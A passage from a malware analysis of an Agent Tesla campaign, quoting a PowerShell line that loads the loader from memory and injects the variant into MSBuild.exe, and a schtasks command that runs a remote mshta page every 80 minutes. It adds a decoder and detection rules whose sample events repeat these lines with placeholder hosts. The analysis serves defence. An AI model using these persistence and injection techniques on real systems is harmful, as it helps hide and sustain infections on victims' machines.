After calling unescape() twice on the first segment of VBScript code, we finally obtain HTML content, as shown in Figure 3.1.

This content contains a piece of VBScript code that performs the three tasks shown below:

- Downloads PowerShell files to deliver the new Agent Tesla variant.

It calls the VBScript method MicrosoftWINdows.Run() with the following parameter.

It then runs PowerShell to execute three PowerShell files downloaded from three URLs. There are two EXE files stored in two huge arrays inside each downloaded PowerShell file. The two EXE files are a loader of Agent Tesla and a new variant of Agent Tesla.

Below is a segment of code extracted from “27-1.txt” as an example to explain how it loads Agent Tesla.

```powershell
# Load the Agent Tesla loader assembly from the byte array $Cli555, look up its Run() method,
# and invoke it with two arguments: the path of the legitimate host binary (MSBuild.exe)
# and the byte array $Cli444 holding the new Agent Tesla variant.
[System.Reflection.Assembly]::Load($Cli555).GetType('WpfControlLibrary1.LOGO').GetMethod('Run').Invoke($null, [object[]]('C:\Windows\Microsoft.NET\Framework\v9\MSBuild.exe', $Cli444))
```

As you can see, it loads the loader from the array $Cli555, which has a function called “Run()” requiring two parameters. It runs a normal EXE file (“MSBuild.exe”), then deploys the new Agent Tesla variant stored in the huge array $Cli444 into it and executes it. This means Agent Tesla will run within “MSBuild.exe”, which is also a way to protect Agent Tesla from being detected by the victim.

The VBScript code adds numerous items into the Auto-Run group in the system registry

Figure 3.2 shows a screenshot of the Auto-Run group in the system registry of an infected system. It creates a WMI (Windows Management Instrumentation) object to add entries to the Auto-Run group by calling its function “SetStringValue()”.

Besides adding items into the Auto-Run group, it adds a scheduled task in “Task Scheduler” to make the entire campaign work effectively. Below is the code used to run “schtasks” to create a new scheduled task.

```vbscript
' Create (or forcibly replace, /F) a task named WIND0WSUPLATE that runs every 80 minutes;
' the task action (/tr) launches mshta with the remote 27.html page.
MicrosoftWINdows.Run "schtasks /create /sc MINUTE /mo 80 /tn \"WIND0WSUPLATE\" /F /tr \"MsHtA\" 27.html\"" ,0
```

Its action is to execute the command “mshta …”, and it is called every 80 minutes.

Hijacking a Bitcoin address on the victim’s device

After being decoded, we then obtained the second piece of VBScript code.
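The two-pass unescape() step described above, as an added example that is not part of the original analysis: a Python reimplementation of the script engine's unescape() (both the %XX and %uXXXX forms, which urllib.parse.unquote does not decode the same way), applied layer by layer until the text stops changing. The encoded sample is constructed for the example and is not taken from the campaign.

```python
"""Layered unescape() decoder for double-encoded script stages.

Added example (not code from the original analysis). It reproduces the
semantics of the VBScript/JScript unescape() function (%XX and %uXXXX
sequences) and applies it repeatedly until the text stops changing, which
mirrors the "unescape() called twice" step in the write-up. The sample
input below is constructed for the example.
"""
from __future__ import annotations

import re

# unescape() understands two escape forms: %XX (one code point 0-255)
# and %uXXXX (one UTF-16 code unit). Everything else is left untouched.
_ESCAPE_RE = re.compile(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})")


def vbs_unescape(text: str) -> str:
    """Decode one layer exactly as the script engine's unescape() would.

    Unlike urllib.parse.unquote, this handles %uXXXX and never reassembles
    the bytes as UTF-8: each %XX maps to the character with that code point.
    """
    def repl(m: re.Match) -> str:
        hex4, hex2 = m.group(1), m.group(2)
        return chr(int(hex4 or hex2, 16))

    return _ESCAPE_RE.sub(repl, text)


def decode_layers(text: str, max_layers: int = 8) -> tuple[str, int]:
    """Apply vbs_unescape() until the output stops changing.

    Returns (decoded_text, layers_removed). The cap guards against
    pathological input that keeps producing new escape sequences.
    """
    layers = 0
    while layers < max_layers:
        decoded = vbs_unescape(text)
        if decoded == text:
            break
        text, layers = decoded, layers + 1
    return text, layers


# Constructed sample: an HTML fragment with a VBScript tag, escaped twice so
# that the visible stage contains only %25 sequences, the way a
# double-encoded dropper stage looks before the first unescape() pass.
SAMPLE_PLAIN = '<script language="VBScript">MsgBox "hi"</script>'
SAMPLE_ENCODED = (
    "%253Cscript%2520language%253D%2522VBScript%2522%253EMsgBox"
    "%2520%2522hi%2522%253C/script%253E"
)

if __name__ == "__main__":
    decoded, n = decode_layers(SAMPLE_ENCODED)
    print(f"removed {n} layer(s):")
    print(decoded)
```

Running the module decodes the constructed sample in two passes and prints the recovered HTML; on a real stage, stop when the output stops changing and inspect the result rather than assuming a fixed number of layers.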
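The three behaviours this section describes (a schtasks task that runs mshta against a remote page on a minute schedule, a PowerShell stage that loads a .NET assembly from a byte array and hands it MSBuild.exe, and Auto-Run entries written through WMI's SetStringValue()) each leave a distinct trace in endpoint telemetry. The following added example, which is not code from the original analysis, runs simple triage rules over constructed Sysmon-style event lines. Field names follow Sysmon's process-creation and registry events; the host, URL, value name and path values are placeholders. One assumption from my own experience is baked into the third rule: a registry write made via the StdRegProv WMI class is performed by the WMI provider host (WmiPrvSE.exe), so the writing image is not the script host itself.

```python
"""Triage rules for the persistence and loader behaviour described above.

Added example (not code from the original analysis). Scans constructed,
Sysmon-style key=value event lines for three behaviours from the write-up.
Field names follow Sysmon; hosts, URLs, value names and paths are placeholders.
"""
from __future__ import annotations

import re

# Constructed sample events, pipe-delimited key=value fields. None are from a real host.
SAMPLE_EVENTS = [
    # 0: scheduled task whose action runs mshta against a remote page every 80 minutes
    r'EventID=1|Image=C:\Windows\System32\schtasks.exe|ParentImage=C:\Windows\System32\wscript.exe'
    r'|CommandLine=schtasks /create /sc MINUTE /mo 80 /tn "WIND0WSUPLATE" /F /tr "MsHtA http://placeholder.invalid/27.html"',
    # 1: PowerShell stage loading an assembly from memory and invoking it with MSBuild.exe
    r"EventID=1|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|ParentImage=C:\Windows\System32\wscript.exe"
    r"|CommandLine=powershell -nop -w hidden -c [System.Reflection.Assembly]::Load($Cli555).GetType('WpfControlLibrary1.LOGO')"
    r".GetMethod('Run').Invoke($null,[object[]]('C:\Windows\Microsoft.NET\Framework\v9\MSBuild.exe',$Cli444))",
    # 2: Run-key value written by the WMI provider host (assumed trace of a StdRegProv.SetStringValue call)
    r"EventID=13|Image=C:\Windows\System32\wbem\WmiPrvSE.exe|TargetObject=HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\placeholder_value"
    r"|Details=mshta http://placeholder.invalid/27.html",
    # 3: benign task: a local binary on a daily schedule
    r'EventID=1|Image=C:\Windows\System32\schtasks.exe|ParentImage=C:\Windows\explorer.exe'
    r'|CommandLine=schtasks /create /sc DAILY /tn "Backup" /tr "C:\Tools\backup.exe"',
    # 4: benign Run-key write by an installer
    r"EventID=13|Image=C:\Program Files\Vendor\setup.exe|TargetObject=HKCU\Software\Microsoft\Windows\CurrentVersion\Run\VendorTray"
    r"|Details=C:\Program Files\Vendor\tray.exe",
]

# Script/proxy hosts that, as a task action pointing at a URL, rarely have a benign explanation.
SCRIPT_HOSTS = ("mshta", "wscript", "cscript", "powershell", "regsvr32", "rundll32")
REMOTE_RE = re.compile(r"https?://", re.IGNORECASE)
ASSEMBLY_LOAD_RE = re.compile(r"\[(?:System\.)?Reflection\.Assembly\]::Load\s*\(", re.IGNORECASE)
RUN_KEY_RE = re.compile(r"\\CurrentVersion\\Run(?:Once)?\\", re.IGNORECASE)


def parse_event(line: str) -> dict[str, str]:
    """Split a pipe-delimited key=value line; only the first '=' of each field separates key and value."""
    fields: dict[str, str] = {}
    for part in line.split("|"):
        key, _, value = part.partition("=")
        fields[key] = value
    return fields


def schtasks_arg(cmd: str, switch: str) -> str | None:
    """Return the value following a schtasks switch, whether quoted or bare."""
    m = re.search(r"(?i)(?:^|\s)" + re.escape(switch) + r"\s+(?:\"([^\"]*)\"|(\S+))", cmd)
    if not m:
        return None
    return m.group(1) if m.group(1) is not None else m.group(2)


def check_event(ev: dict[str, str]) -> list[str]:
    """Return human-readable findings for one parsed event (empty list when nothing matches)."""
    hits: list[str] = []
    image = ev.get("Image", "").lower()
    cmd = ev.get("CommandLine", "")
    event_id = ev.get("EventID")

    # Rule 1: schtasks /create whose action launches a script host against a remote URL.
    if event_id == "1" and image.endswith("\\schtasks.exe") and re.search(r"(?i)/create\b", cmd):
        action = (schtasks_arg(cmd, "/tr") or "").strip()
        sched = (schtasks_arg(cmd, "/sc") or "").upper()
        first = action.split(" ", 1)[0].lower().rsplit("\\", 1)[-1]
        first = first[:-4] if first.endswith(".exe") else first
        if first in SCRIPT_HOSTS and REMOTE_RE.search(action):
            cadence = f" every {schtasks_arg(cmd, '/mo')} minute(s)" if sched == "MINUTE" else ""
            hits.append(f"scheduled task {schtasks_arg(cmd, '/tn')!r} runs {first} against a remote URL{cadence}")

    # Rule 2: PowerShell loading a .NET assembly from memory and invoking it reflectively.
    if event_id == "1" and "powershell" in image and ASSEMBLY_LOAD_RE.search(cmd) and ".Invoke(" in cmd:
        target = "MSBuild.exe" if "msbuild.exe" in cmd.lower() else "another process"
        hits.append(f"in-memory .NET assembly load with reflective Invoke(), handing it {target}")

    # Rule 3: Run-key value written by the WMI provider host rather than by an installer or the user.
    if event_id == "13" and RUN_KEY_RE.search(ev.get("TargetObject", "")) and image.endswith("\\wmiprvse.exe"):
        hits.append("Run-key value written via the WMI provider host (script-driven StdRegProv write)")
    return hits


def triage(lines: list[str]) -> list[tuple[int, str]]:
    """Return (line_index, finding) pairs for every rule hit across the given events."""
    return [(i, hit) for i, line in enumerate(lines) for hit in check_event(parse_event(line))]


if __name__ == "__main__":
    for index, finding in triage(SAMPLE_EVENTS):
        print(f"event {index}: {finding}")
```

The rules are deliberately narrow: rule 1 keys on the combination of a script host, a remote URL and a short repeating schedule rather than on the task name, which an operator can change at will; rule 3 shows why the writing image matters, since a Run-key write attributed to WmiPrvSE.exe rather than to an installer is what makes the WMI-driven SetStringValue() path stand out.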